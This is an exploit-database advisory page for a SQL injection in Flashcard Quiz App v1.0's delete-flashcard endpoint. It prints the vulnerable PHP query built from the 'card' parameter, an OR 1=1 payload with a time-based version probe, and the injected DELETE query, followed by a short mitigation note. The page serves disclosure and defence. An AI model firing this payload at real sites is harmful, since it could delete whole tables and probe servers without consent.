header-logo
Suggest Exploit
vendor:
Flashcard Quiz App
by:
SoSPiro
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Flashcard Quiz App
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:flashcard_quiz_app:flashcard_quiz_app:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 64 bit Wampserver
2024

Flashcard Quiz App v1.0 – ‘card’ SQL Injection

The Flashcard Quiz App v1.0 is prone to SQL injection due to unsanitized user inputs directly concatenated into SQL queries. An attacker can manipulate the SQL query through the 'card' parameter in the URL, potentially leading to unauthorized actions on the database.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL injection attacks. Avoid directly concatenating user inputs into SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection
# Google Dork: N/A
# Application: Flashcard Quiz App
# Date: 25.02.2024
# Bugs: SQL Injection 
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver 
# CVE : N/A


## Vulnerability Description:

The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.


## Proof of Concept (PoC):

This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.

1. Original Code:

$card = $_GET['card'];

$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";

2. Payload:

' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --

3. Injected Query:

DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --

Request Response foto: https://i.imgur.com/5IXvpiZ.png


## Vulnerable code section:
====================================================
endpoint/delete-flashcard.php

$card = $_GET['card'];

$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";

Navigation

Suggest Exploit

Services By CQR